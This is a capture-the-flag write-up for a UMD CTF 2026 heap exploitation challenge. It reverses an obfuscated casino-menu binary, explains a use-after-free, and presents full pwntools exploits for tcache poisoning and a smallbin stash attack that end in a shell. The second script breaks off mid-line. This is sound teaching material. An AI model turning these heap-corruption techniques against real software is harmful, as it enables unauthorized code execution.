
[{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/","section":"","summary":"","title":"","type":"page"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/ctfs/","section":"CTFs","summary":"","title":"CTFs","type":"ctfs"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/heap/","section":"Tags","summary":"","title":"Heap","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/obfuscation/","section":"Tags","summary":"","title":"Obfuscation","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/topics/pwn/","section":"Topics","summary":"Binary exploitation and memory corruption challenges.","title":"Pwn","type":"topics"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/safe-linking/","section":"Tags","summary":"","title":"Safe-Linking","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/smallbin-attack/","section":"Tags","summary":"","title":"Smallbin-Attack","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/tcache-poisoning/","section":"Tags","summary":"","title":"Tcache-Poisoning","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/topics/","section":"Topics","summary":"Browse writeups by category.","title":"Topics","type":"topics"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/tags/uaf/","section":"Tags","summary":"","title":"Uaf","type":"tags"},{"content":"","date":"25 April 2026","externalUrl":null,"permalink":"/writeups/ctfs/umd-26/","section":"CTFs","summary":"","title":"UMD CTF 2026","type":"ctfs"},{"content":" the house tightened the rules\nnc challs.umdctf.io 30304 First contact # Connect; eight options, vaguely casino-themed:\nwelcome to the velvet table. house policy: all sales final. table marker: 0x7c4f1b2e 1) reserve 2) cashout 3) update 4) inspect 5) dealer-note 6) payout 7) settle-ledger 8) leave \u0026gt; The \u0026ldquo;table marker\u0026rdquo; line is interesting: it prints once on startup and never appears again. Set it aside; almost certainly a leak we\u0026rsquo;ll have to come back to.\nA few minutes of poking the menu narrows the action set down to roughly: reserve asks for a seat (0..15) and a size, mallocs, prints the heap pointer; cashout frees a seat; update writes into one; inspect dumps it back, but obfuscated. The other four are weirder.\nReverse triage # Checksec:\nArch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled FORTIFY: Enabled No canary, full RELRO, PIE. system is in the imports, and the binary contains:\nint win() { puts(\u0026#34;yay.\u0026#34;); return system(\u0026#34;/bin/sh\u0026#34;); } So we don\u0026rsquo;t need a libc leak; we just need to call win. North star.\nOpen main in IDA and you\u0026rsquo;re greeted by a wall of XOR\u0026rsquo;d reads/writes, rotates, mixed indices, and bizarre per-iteration key derivations. Resist the temptation to start decoding any of it. The whole pile is, at the end of the day, a heap challenge, so the only thing that matters initially is which menu options touch which heap region, which can free, which can write, which can read.\nUnder the obfuscation there\u0026rsquo;s a 16-element .bss array of records:\nstruct Table { void *ptr; size_t size; int occupied; }; Table tables[16]; Every handler indexes it by a permuted seat number: idx = ((seat ^ v51) + 3) \u0026amp; 0xF. v51 is one of the XOR-derived constants; just a permutation, ignore it. Walking the switch cases.\nreserve # size = get_num(); if (size - 0x80 \u0026gt; 0x100) { puts(\u0026#34;size rejected.\u0026#34;); break; } // 0x80 \u0026lt;= size \u0026lt;= 0x180 if (tables[idx].occupied) { puts(\u0026#34;seat occupied.\u0026#34;); break; } void *p = malloc(size); tables[idx].ptr = p; if (size == 0x100) { if (tcache_ctr_0x100) tcache_ctr_0x100--; } else if (size == 0x180) { if (tcache_ctr_0x180) tcache_ctr_0x180--; } idk_count += 2; tables[idx].size = size; tables[idx].occupied = 1; __printf_chk(1, \u0026#34;reservation confirmed: %p\\n\u0026#34;, p); // heap leak malloc, store, print the pointer (heap leak). Sizes clamped to [0x80, 0x180]. Two per-size counters decrement when the request matches; we\u0026rsquo;ll see the matching increment in cashout.\ncashout # free(tables[idx].ptr); tables[idx].occupied = 0; size = tables[idx].size; if (size == 0x100) { v38 = tcache_ctr_0x100; v39 = \u0026amp;tcache_ctr_0x100; } else if (size == 0x180) { v38 = tcache_ctr_0x180; v39 = \u0026amp;tcache_ctr_0x180; } else goto out; // \u0026lt;-- pointer never zeroed if (v38 \u0026lt;= 6) { *v39 = v38 + 1; tables[idx].ptr = NULL; } out: ++idk_count; puts(\u0026#34;cashed out.\u0026#34;); Mirror of reserve: free, bump the size-matched counter, null the pointer. The goto out for non-matching sizes is going to matter.\nupdate # length = get_num(); if (length - 1 \u0026gt; 0x3FF) { puts(\u0026#34;length rejected.\u0026#34;); break; } // bounded vs 0x400, NOT vs chunk size get_data(scratch, length); if (settled) { memcpy(tables[idx].ptr, scratch, length); } else { char v40 = (((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0xD9) \u0026amp; 1; for (i = 0; i \u0026lt; length; ++i) { if ((v40 \u0026amp; 1) == 0) ((char *)tables[idx].ptr)[i] = scratch[i]; // every other byte ++v40; } } Two write modes. Pre-settle: every other byte lands; the rest is left at its previous value. Post-settle: clean memcpy with no bound on the chunk\u0026rsquo;s actual size, only on length itself.\ninspect # size_capped = min(0x40, tables[idx].size); v15 = 0; for (i = 0; i \u0026lt; size_capped; ++i) { char k = __ROL4__(v15 ^ v49 ^ (0x45D9F3B * v43), (v43 + i) \u0026amp; 7); putchar(((char *)tables[idx].ptr)[i] ^ k); v15 += 0x9E37; } XOR-stream cipher, capped to 0x40 bytes per call. The key derives from v49 and v43, both functions of \u0026amp;thing. Once we have the marker we can decode this client-side.\ndealer-note # if (idk_count \u0026lt;= 4 || (action_count \u0026amp; 3) != 0) { puts(\u0026#34;dealer busy.\u0026#34;); break; } get_data(scratch, 0x20); for (i = 0; i \u0026lt; 0x20; ++i) { v37 = v6 ^ v49; v6 += 0x27D4EB2D; ((char *)\u0026amp;thing)[i] = scratch[i] ^ (107 * (BYTE2(v37) ^ v37)); } Direct write into the start of thing \u0026ndash; a stack-local struct in main\u0026rsquo;s frame, more on it below. 32 bytes, XOR-decoded, gated on the action counters.\npayout # if (idk_count \u0026amp; 1) { if (thing.hash == ((u64)thing.func ^ v47 ^ \u0026#39;house_ed\u0026#39;)) thing.func(); else puts(\u0026#34;house edge.\u0026#34;); } else { puts(\u0026#34;payout locked.\u0026#34;); } Calls a stack-local function pointer if a tagged-pointer integrity check passes, and only when idk_count is odd. This is the win primitive. Rewrite thing.func to point at win and thing.hash to the matching tag, manage parity, and payout calls anything.\n(idk_count is my placeholder name for an opaque counter the handlers all bump. Nothing actually reads its magnitude; only settle\u0026rsquo;s \u0026gt; 6 check and payout\u0026rsquo;s parity gate do anything with it. Looks like more obfuscation, treated as such.)\nsettle-ledger # if (idk_count \u0026lt;= 6) puts(\u0026#34;ledger mismatch.\u0026#34;); else { puts(\u0026#34;ledger settled.\u0026#34;); settled = 1; } Flips settled once the counter passes 6. Three reserves and a cashout get there.\nleave # return from main. Trivial.\nthe stack struct # The struct dealer-note writes into and payout calls through is laid out in main\u0026rsquo;s frame as:\nstruct { uint64_t prev_size; // 0 uint64_t size; // 0x111 uint64_t fd; // 0 uint64_t bk; // 0 void (*func)(void); // = ticket_rejected uint64_t hash; // = func ^ key ^ \u0026#39;house_ed\u0026#39; } thing; The func/hash pair is the win primitive: rewrite both consistently and payout calls whatever func is. The first four fields read like the start of a malloc chunk header; that becomes relevant for the intended path.\n'house_ed' is the C multi-character constant 0x686F7573655F6564, just a fixed 8-byte literal. The key mixed into the hash is one of those XOR-derived values we said we\u0026rsquo;d ignore for now.\nPulling it together \u0026ndash; three benign primitives and three bugs:\nreserve leaks a heap pointer. inspect is our read primitive, stream cipher we can undo client-side. payout calls thing.func if the tagged-pointer hash matches and idk_count is odd. Cashout: the size check is inverted. reserve decrements the per-size counters; cashout only bumps them and nulls the pointer when the size matches 0x100 or 0x180. Every other size in [0x80, 0x180] falls through goto out with the pointer never nulled \u0026ndash; one cashout on a 0x80 chunk is a clean UAF. Update: split personality. Pre-settle only every other byte lands; post-settle it\u0026rsquo;s a clean memcpy bounded only on input length (vs 0x400), not the chunk size. Step one of every exploit is calling settle, which needs idk_count \u0026gt; 6 \u0026ndash; four reserves get there. Dealer-note: 32 bytes written directly into the start of thing. That covers prev_size/size/fd/bk, not func/hash. The only handler that touches the stack struct\u0026rsquo;s chunk header without first having a heap pointer aimed there. The plan, in outline: write thing.func/thing.hash, then call payout. Both paths boil down to that; they only differ in how they construct the alias. Dealer-note can\u0026rsquo;t reach func (only the first 32 bytes), so we need a heap pointer aimed at \u0026amp;thing and use update through it. Constructing that aliasing pointer is the rest of the challenge.\nThe marker is a stack leak # Back to that line on startup. It comes from:\nprintf(\u0026#34;table marker: 0x%08x\\n\u0026#34;, ((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0x9AC90307); Reading the format: %08x prints 32 bits, fed ((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0x9AC90307. Undo the XOR and we have the bottom 32 bits of \u0026amp;thing \u0026gt;\u0026gt; 4, i.e. bits 4..35 of \u0026amp;thing. The bottom nibble is always 0 (16-byte stack alignment), so we recover bits 4..35 directly; what\u0026rsquo;s missing is bits 36..47 (12 bits at the top).\nIn practice on Linux x86-64 user-space, those top bits are always 0x7ff for a stack address \u0026ndash; I\u0026rsquo;ve never seen otherwise. So we just hardcode it:\nru(b\u0026#34;table marker: 0x\u0026#34;) table_marker = (int(rl(), 16) ^ 0x9AC90307) \u0026lt;\u0026lt; 4 stack_addr = (0x7ff \u0026lt;\u0026lt; 36) | table_marker # full \u0026amp;thing We have \u0026amp;thing. Combined with payout calling thing.func, the rough plan writes itself: get a heap pointer aimed at \u0026amp;thing, write through it, call payout. The how is the rest of the challenge.\nDecoding the keys # Now we go back and look at all the XOR muck. Reading carefully through main, every per-menu stream cipher and integrity tag derives from one of three values, and each of those derives from \u0026amp;thing \u0026gt;\u0026gt; 4:\nkey1 = ((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0x5A17C3D9; // 32-bit, used in inspect / dealer-note / payout key2 = (((u64)\u0026amp;thing \u0026gt;\u0026gt; 4) ^ 0x7E) \u0026amp; 0xF; // 4-bit, seat permutation key3 = (u64)key1 \u0026lt;\u0026lt; 32; // top half of payout\u0026#39;s tagged-pointer key In English: knowing the marker means knowing every key in the binary. There\u0026rsquo;s no brute force or pen-and-paper anywhere. Decoding inspect / dealer-note / payout is just a few lines of Python each; the read primitive\u0026rsquo;s cipher is folded out below, and the rest follow the same shape.\nStream cipher behind inspect Each output byte is:\nkey2 = ((stack_addr \u0026gt;\u0026gt; 4) ^ 0x7E) \u0026amp; 0xF v43 = ((seat ^ key2) + 3) \u0026amp; 0xF v15 = 0 out = b\u0026#34;\u0026#34; for i, byte in enumerate(raw_bytes): k32 = rol((v15 ^ key1 ^ (0x45D9F3B * v43)) \u0026amp; 0xFFFFFFFF, (v43 + i) \u0026amp; 7, 32) out += bytes([byte ^ (k32 \u0026amp; 0xFF)]) v15 = (v15 + 0x9e37) \u0026amp; 0xFFFFFFFF The two pitfalls are (a) __ROL4__ in IDA is rotate-left 32-bit, not 64-bit, and (b) the assignment in the binary is s = (char)(byte ^ rol32_result), so only the low byte of the rolled value participates. inspect is also size-capped at 0x40 bytes per call \u0026ndash; enough for everything we need.\nEasy path: tcache poison through the size hole # Anything in [0x80, 0x180] other than the two protected sizes is a UAF on the very first cashout. With UAF on a tcache chunk, this is a textbook safe-linking poison (assumes glibc 2.32+; confirmed empirically). Pick 0x80, chunk size 0x90, tcache bin [0x90]:\ndef prot_ptr(pos, target): return (pos \u0026gt;\u0026gt; 12) ^ target reserve(4, 0x80) # extra: bumps idk_count past settle\u0026#39;s threshold of 6 reserve(3, 0x80) pos = reserve(0, 0x80) cashout(3); cashout(0) # tcache[0x90] count = 2 (bin indexed by chunk size, not request) settle() update(0, 8, p64(prot_ptr(pos, stack_addr))) reserve(1, 0x80) # pops `pos`, freelist head -\u0026gt; stack reserve(2, 0x80) # pops stack; tables[2].ptr aliases the stack struct Two cashouts because tcache_get only consults the freelist while count \u0026gt; 0: the first reserve drops the count to 1 and pops pos, the second drops it to 0 and pops our forged target.\nAfter step 5 above, tables[2].ptr is the stack struct\u0026rsquo;s address. inspect(2) reads through the alias, and offset 0x20 lands on func (still ticket_rejected):\nRead offset Stack-struct field 0x00 prev_size 0x08 size (0x111) 0x10 fd 0x18 bk 0x20 func (still ticket_rejected) 0x28 hash PIE leak, then write the matching (func, hash) pair through the alias and call payout:\ncontent = inspect(2) elf.address = uu64(content[0x20:0x28]) - 0x1b50 win = elf.address + 0x1b60 win_hash = ((key1 \u0026lt;\u0026lt; 32) ^ win ^ 0x686F7573655F6564) \u0026amp; 0xFFFFFFFFFFFFFFFF update(2, 0x30, b\u0026#34;A\u0026#34; * 0x20 + p64(win) + p64(win_hash)) payout() Done. About ten menu actions, no obfuscation worse than safe-linking and the reverse of inspect\u0026rsquo;s stream cipher.\nWhat was supposed to happen # Look at the cashout snippet again. The shape of the protection \u0026ndash; per-size counter saturating at 7, only nulling while the counter is below threshold \u0026ndash; only makes sense as a tcache fill tracker. Once tcache for a given size is full, further frees go to the unsorted bin and the counter freezes. The dev wanted to hand you UAF specifically on an unsorted-bin chunk for sizes 0x100 and 0x180. Those two are arbitrary picks among the binary\u0026rsquo;s smallbin-eligible range \u0026ndash; chunk sizes need to be larger than the 0x80 fastbin cap and smaller than the 0x420 largebin floor, but anything in that band would work.\nCombined with dealer-note (which writes the first 0x20 bytes of the stack struct \u0026ndash; exactly prev_size/size/fd/bk), the binary is staged for a smallbin attack against the stack: free a smallbin-sized chunk into the unsorted bin via the intentional UAF, sort it into a smallbin with a follow-up allocation, then forge the stack as a fake bin neighbour and trigger an unlink.\nThe intended check should have looked something like:\nif (size != 0x100 \u0026amp;\u0026amp; size != 0x180) { tables[idx].ptr = NULL; // unsupported sizes: always null, no UAF goto out; } if (v38 \u0026lt;= 6) { // supported sizes: only null while tcache has room *v39 = v38 + 1; tables[idx].ptr = NULL; } Instead the check is inverted: unsupported sizes fall through to goto out without the null. The intended bug was one specific UAF; the implementation produced a dozen.\nIntended path: smallbin attack via dealer-note # Now the proper route. The story:\nSet up so we get UAF on a chunk that\u0026rsquo;s about to land in smallbin [0x110]. Use that UAF to make the bin\u0026rsquo;s tail point at the stack struct. Use dealer-note to forge the stack struct so the smallbin\u0026rsquo;s consistency check accepts it. Trigger a malloc(0x100) \u0026ndash; the smallbin allocator unlinks our victim, then a follow-up loop puts the stack struct into tcache. A further malloc(0x100) pops the stack struct out of tcache, returning a \u0026ldquo;user pointer\u0026rdquo; that lands inside it. Solid arrows in the diagrams are fd, dashed arrows are bk. Smallbins are circular doubly-linked lists.\nOne pragmatic note before the steps: the server cuts the connection on a wall-clock timer, and this path runs sixteen reserves and eight cashouts plus all the inspect/update/dealer-note/settle/payout actions. Three round-trip sendlineafter calls per menu action (one per prompt) misses the window. Every helper in the final exploit batches the whole interaction into a single sendafter, like:\ndef reserve(seat, size): sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;1\\n{seat}\\n{size}\\n\u0026#34;.encode()) ru(b\u0026#34;reservation confirmed: 0x\u0026#34;) return int(rl(), 16) A few hundred ms saved per action is the difference between a stable shell and a connection that closes mid-cat. Even with batched writes the post-payout window is tight, so the final exploit also pre-queues ls and cat ./flag.txt as sendlines before going interactive. The easy path is short enough that round-trip sendlineafter still fits; only the intended chain feels the timer.\nStep 1: stage the unsorted-bin UAF # Saturate the 0x100 cashout counter, then do one more cashout:\nfor i in range(7): reserve(15 - i, 0x100) # warm bodies that will fill tcache pos = reserve(0, 0x100) # the chunk we\u0026#39;ll preserve a pointer to reserve(8, 0x180) # guard against top-chunk consolidation for i in range(7): cashout(15 - i) # tcache_ctr_0x100 saturates at 7 cashout(0) # 8th cashout: ptr stays valid, chunk -\u0026gt; unsorted Heap state:\nflowchart LR TC[\"tcache[0x110]count = 7\"] --\u003e T0[\"chunk\"] --\u003e T1[\"chunk\"] --\u003e Tdots[\"...four more...\"] --\u003e T6[\"chunk\"] UB[\"unsorted bin\"] --\u003e|fd| C[\"chunk C(seat 0, dangling)\"] C --\u003e|fd| UB C -.-\u003e|bk| UB UB -.-\u003e|bk| C style C fill:#ff6b6b,color:#fff style UB fill:#868e96,color:#fff We hold a usable pointer into C (its user data starts at pos) even though malloc considers it free. The 0x180 reserve at seat 8 sits between C and the wilderness; without it, freeing seat 0 would consolidate forward into the top chunk instead of going to the unsorted bin.\nStep 2: sort C into the smallbin # Any allocation that the unsorted bin can\u0026rsquo;t service will walk it, sorting C out into the right bin. The 0x180 reserve is convenient for this \u0026ndash; it\u0026rsquo;s not 0x110, so C gets pushed out:\nreserve(7, 0x180) _int_malloc walks unsorted, sees C (size 0x110), can\u0026rsquo;t use it for this 0x180 request, sorts it into smallbin [0x110]:\nflowchart LR BIN[\"smallbin[0x110](bin head in libc arena)\"] --\u003e|fd| C[\"chunk Cfd = bin_headbk = bin_head\"] C --\u003e|fd| BIN C -.-\u003e|bk| BIN BIN -.-\u003e|bk| C style C fill:#ff6b6b,color:#fff style BIN fill:#868e96,color:#fff Both C-\u0026gt;fd and C-\u0026gt;bk point at the bin sentinel in libc. inspect(0) reads C-\u0026gt;fd:\nbin_head = uu64(inspect(0)[0:8]) # libc bin sentinel Step 3: forge the fake \u0026ldquo;next chunk\u0026rdquo; on the stack # Smallbin allocation pops the bin\u0026rsquo;s tail (bin-\u0026gt;bk), and on the way out it walks one further hop via victim-\u0026gt;bk and stashes that hop into tcache via the so-called tcache-stash loop. We want that one-further hop to land on the stack struct.\nThe next allocation will run two checks against the stack struct:\nvictim = last(bin); // C bck = victim-\u0026gt;bk; // we\u0026#39;ll be making this \u0026amp;thing if (bck-\u0026gt;fd != victim) abort(); // (1) so \u0026amp;thing.fd MUST equal C ... tc_victim = last(bin); // \u0026amp;thing (after the line above sets bin-\u0026gt;bk = bck) bck = tc_victim-\u0026gt;bk; // (2) we want this = bin_head, so the loop terminates Translation: *(stack_addr + 0x10) (the fd slot of the stack struct) must equal C\u0026rsquo;s chunk address (pos - 0x10), and *(stack_addr + 0x18) (the bk slot) must equal bin_head. The prev_size and size slots aren\u0026rsquo;t read on this path, but the binary already initialises them to a reasonable header so we just preserve it:\nblock-beta columns 2 a[\"+0x00prev_size = 0\"] b[\"+0x08size = 0x111\"] c[\"+0x10fd = pos - 0x10(satisfies bck-\u003efd check)\"] d[\"+0x18bk = bin_head(terminates stash loop)\"] e[\"+0x20func(unchanged for now)\"] f[\"+0x28hash(unchanged for now)\"] style c fill:#51cf66,color:#fff style d fill:#51cf66,color:#fff dealer-note writes exactly the first 0x20 bytes \u0026ndash; the green/blue header \u0026ndash; and nothing further. That\u0026rsquo;s why it exists in the binary at all:\nfake_chunk = p64(0) + p64(0x110 | 1) + p64(pos - 0x10) + p64(bin_head) dealer_note(fake_chunk) settle() Step 4: link the stack into the smallbin via the UAF # Right now the smallbin only knows about C. We need C-\u0026gt;bk to lie and say \u0026ldquo;the next chunk is the stack region\u0026rdquo;. update after settle is a clean memcpy:\nupdate(0, 0x10, p64(bin_head) + p64(stack_addr)) (We rewrite fd too with the same value libc already had there. Only bk matters for the attack.)\nState now \u0026ndash; the bin head still believes the chain is just bin \u0026lt;-\u0026gt; C, but C has been told that its bk neighbour is the stack:\nflowchart LR BIN[\"smallbin[0x110](libc)\"] --\u003e|fd| C[\"chunk Cfd = bin_headbk = stack_addr ✗\"] C --\u003e|fd| BIN BIN -.-\u003e|bk| C C -.-\u003e|bk| S[\"fake stack chunkfd = pos - 0x10 (= C)bk = bin_head\"] S -.-\u003e|bk| BIN S --\u003e|fd| C style C fill:#ff6b6b,color:#fff style S fill:#51cf66,color:#fff style BIN fill:#868e96,color:#fff The dashed bk chain now reads: BIN \u0026lt;- C \u0026lt;- stack \u0026lt;- BIN, three hops instead of two \u0026ndash; glibc thinks the smallbin has two chunks. The solid fd chain libc walks from the head still goes BIN -\u0026gt; C -\u0026gt; BIN, because we never had the means to corrupt bin-\u0026gt;fd (it\u0026rsquo;s in libc\u0026rsquo;s arena). The lie is one-sided.\nThat asymmetry is exactly what the smallbin allocator falls for. It only walks bk hops one step and only validates one hop deep \u0026ndash; it asks bck-\u0026gt;fd == victim?, doesn\u0026rsquo;t ask bin-\u0026gt;fd == victim or anything more thorough. Our forged stack.fd = C makes the one check it does run pass.\nStep 5: trigger the smallbin allocation # Drain the 0x110 tcache so the next malloc(0x100) has to use the smallbin path:\nfor i in range(7): reserve(15 - i, 0x100) # tcache_ctr_0x100 -\u0026gt; 0 Then trigger:\nreserve(0, 0x100) Inside _int_malloc\u0026rsquo;s smallbin path:\nvictim = last(bin); // C bck = victim-\u0026gt;bk; // stack_addr if (bck-\u0026gt;fd != victim) abort(); // stack.fd == C, passes ✓ bin-\u0026gt;bk = bck; // bin-\u0026gt;bk = stack_addr bck-\u0026gt;fd = bin; // stack.fd \u0026lt;- bin_head (clobbers our forged fd) /* tcache stash loop runs once */ tc_victim = last(bin); // stack_addr bck = tc_victim-\u0026gt;bk; // stack.bk == bin_head bin-\u0026gt;bk = bck; // last(bin) == bin -\u0026gt; next iter exits tcache_put(tc_victim, idx); // stack_addr -\u0026gt; tcache[0x110] return chunk2mem(victim); // returns C Three writes happen we didn\u0026rsquo;t have direct control over, none of them matter: the two bin-\u0026gt;bk writes both update libc\u0026rsquo;s arena, and the stack.fd \u0026lt;- bin_head write clobbers our forged-but-already-used fd slot. After this:\nflowchart LR TC[\"tcache[0x110]count = 1\"] --\u003e S[\"stack_addr(stashed by smallbin loop)\"] style S fill:#51cf66,color:#fff Step 6: pop the stack out of tcache # Next malloc(0x100) pops it directly:\nreserve(1, 0x100) # tables[1].ptr = chunk2mem(stack_addr) = stack_addr + 0x10 tables[1].ptr lands at stack_addr + 0x10, which is the fd slot of the stack struct. Reading offset 0x10 past that pointer hits func:\nRead offset Stack-struct field 0x00 fd (now bin_head, clobbered by the unlink) 0x08 bk (now bin_head from the stash loop) 0x10 func (still ticket_rejected) 0x18 hash PIE leak, then write through:\ncontent = inspect(1) elf.address = uu64(content[0x10:0x18]) - 0x1b50 win = elf.address + 0x1b60 win_hash = ((key1 \u0026lt;\u0026lt; 32) ^ win ^ 0x686F7573655F6564) \u0026amp; 0xFFFFFFFFFFFFFFFF update(1, 0x20, b\u0026#34;A\u0026#34; * 0x10 + p64(win) + p64(win_hash)) cashout(15) # parity bump for payout payout() Final exploits # Full solve.py for the unintended tcache poison from pwn import * elf = context.binary = ELF(\u0026#34;./velvet-table\u0026#34;) def ru(*a, **k): return p.recvuntil(*a, **k, drop=True) def rl(*a, **k): return p.recvline(*a, **k, keepends=False) def sla(*a, **k): return p.sendlineafter(*a, **k) def sa(*a, **k): return p.sendafter(*a, **k) def sl(*a, **k): return p.sendline(*a, **k) def uu64(d): return u64(d.ljust(8, b\u0026#34;\\0\u0026#34;)) def prot_ptr(pos, ptr): return (pos \u0026gt;\u0026gt; 12) ^ ptr p = remote(\u0026#34;challs.umdctf.io\u0026#34;, 30304) ru(b\u0026#34;table marker: 0x\u0026#34;) table_marker = (int(rl(), 16) ^ 0x9AC90307) \u0026lt;\u0026lt; 4 stack_addr = (0x7ff \u0026lt;\u0026lt; 36) | table_marker key1 = (stack_addr \u0026gt;\u0026gt; 4) ^ 0x5A17C3D9 def reserve(seat, size): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;1\u0026#34;); sla(b\u0026#34;seat: \u0026#34;, str(seat).encode()); sla(b\u0026#34;size: \u0026#34;, str(size).encode()) ru(b\u0026#34;reservation confirmed: 0x\u0026#34;) return int(rl(), 16) def cashout(seat): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;2\u0026#34;); sla(b\u0026#34;seat: \u0026#34;, str(seat).encode()) def update(seat, length, data): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;3\u0026#34;); sla(b\u0026#34;seat: \u0026#34;, str(seat).encode()) sla(b\u0026#34;length: \u0026#34;, str(length).encode()); sa(b\u0026#34;data:\\n\u0026#34;, data) def settle(): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;7\u0026#34;) def payout(): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;6\u0026#34;) def inspect(seat): sla(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;4\u0026#34;); sla(b\u0026#34;seat: \u0026#34;, str(seat).encode()) res = ru(b\u0026#34;\\n1)\u0026#34;) key2 = ((stack_addr \u0026gt;\u0026gt; 4) ^ 0x7E) \u0026amp; 0xF v43 = ((seat ^ key2) + 3) \u0026amp; 0xF v15, out = 0, b\u0026#34;\u0026#34; for i, byte in enumerate(res): k32 = rol((v15 ^ key1 ^ (0x45D9F3B * v43)) \u0026amp; 0xFFFFFFFF, (v43 + i) \u0026amp; 7, 32) out += bytes([byte ^ (k32 \u0026amp; 0xFF)]) v15 = (v15 + 0x9e37) \u0026amp; 0xFFFFFFFF return out reserve(4, 0x80) # extra: bumps idk_count past settle\u0026#39;s threshold reserve(3, 0x80) pos = reserve(0, 0x80) cashout(3); cashout(0) # tcache[0x90] count = 2 settle() update(0, 8, p64(prot_ptr(pos, stack_addr))) reserve(1, 0x80) # pops original chunk, freelist head -\u0026gt; stack reserve(2, 0x80) # pops stack address content = inspect(2) elf.address = uu64(content[0x20:0x28]) - 0x1b50 win = elf.address + 0x1b60 win_hash = ((key1 \u0026lt;\u0026lt; 32) ^ win ^ 0x686F7573655F6564) \u0026amp; 0xFFFFFFFFFFFFFFFF update(2, 0x30, b\u0026#34;A\u0026#34; * 0x20 + p64(win) + p64(win_hash)) payout() sl(b\u0026#34;cat ./flag.txt\u0026#34;) p.interactive() Full solve.py for the intended smallbin attack from pwn import * elf = context.binary = ELF(\u0026#34;./velvet-table\u0026#34;) def ru(*a, **k): return p.recvuntil(*a, **k, drop=True) def rl(*a, **k): return p.recvline(*a, **k, keepends=False) def sa(*a, **k): return p.sendafter(*a, **k) def sl(*a, **k): return p.sendline(*a, **k) def uu64(d): return u64(d.ljust(8, b\u0026#34;\\0\u0026#34;)) p = remote(\u0026#34;challs.umdctf.io\u0026#34;, 30304) ru(b\u0026#34;table marker: 0x\u0026#34;) table_marker = (int(rl(), 16) ^ 0x9AC90307) \u0026lt;\u0026lt; 4 stack_addr = (0x7ff \u0026lt;\u0026lt; 36) | table_marker key1 = (stack_addr \u0026gt;\u0026gt; 4) ^ 0x5A17C3D9 action_count = 0 def reserve(seat, size): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;1\\n{seat}\\n{size}\\n\u0026#34;.encode()) ru(b\u0026#34;reservation confirmed: 0x\u0026#34;) return int(rl(), 16) def cashout(seat): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;2\\n{seat}\\n\u0026#34;.encode()) def update(seat, length, data): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;3\\n{seat}\\n{length}\\n\u0026#34;.encode() + data) def settle(): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;7\\n\u0026#34;) def payout(): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;6\\n\u0026#34;) def inspect(seat): global action_count action_count += 1 sa(b\u0026#34;\u0026gt;\u0026#34;, f\u0026#34;4\\n{seat}\\n\u0026#34;.encode()) res = ru(b\u0026#34;\\n1) reserve\u0026#34;) key2 = ((stack_addr \u0026gt;\u0026gt; 4) ^ 0x7E) \u0026amp; 0xF v43 = ((seat ^ key2) + 3) \u0026amp; 0xF v15, out = 0, b\u0026#34;\u0026#34; for i, byte in enumerate(res): k32 = rol((v15 ^ key1 ^ (0x45D9F3B * v43)) \u0026amp; 0xFFFFFFFF, (v43 + i) \u0026amp; 7, 32) out += bytes([byte ^ (k32 \u0026amp; 0xFF)]) v15 = (v15 + 0x9e37) \u0026amp; 0xFFFFFFFF return out def dealer_note(note): global action_count v6 = action_count \u0026amp; 3 action_count += 1 obfuscated = b\u0026#34;\u0026#34; for byte in note: v37 = v6 ^ key1 v6 = (v6 + 0x27D4EB2D) \u0026amp; 0xFFFFFFFFFFFFFFFF mixed = ((v37 \u0026gt;\u0026gt; 0x10) ^ v37) \u0026amp; 0xFF obfuscated += bytes([byte ^ ((0x6b * mixed) \u0026amp; 0xff)]) sa(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;5\\n\u0026#34; + obfuscated) # saturate 0x100 protection, then one more cashout into unsorted bin (UAF preserved) for i in range(7): reserve(15 - i, 0x100) pos = reserve(0, 0x100) reserve(8, 0x180) # guard against top-chunk consolidation for i in range(7): cashout(15 - i) # tcache_ctr_0x100 = 7 (saturated) cashout(0) # ptr stays valid; chunk -\u0026gt; unsorted bin reserve(7, 0x180) # walks unsorted, sorts our 0x110 into smallbin bin_head = uu64(inspect(0)[0:8]) # Forge fake chunk on the stack so smallbin consistency check passes: # stack.fd must equal the victim chunk address (= pos - 0x10). fake_chunk = p64(0) + p64(0x110 | 1) + p64(pos - 0x10) + p64(bin_head) dealer_note(fake_chunk) settle() # Rewire the smallbin chunk: bk = stack so the next malloc unlinks through our forgery. update(0, 0x10, p64(bin_head) + p64(stack_addr)) # Drain the 0x100 tcache so the next reserve takes the smallbin path. for i in range(7): reserve(15 - i, 0x100) reserve(0, 0x100) # smallbin unlink + tcache-stash stack_addr reserve(1, 0x100) # pop stack -- tables[1].ptr is stack-aliased content = inspect(1) elf.address = 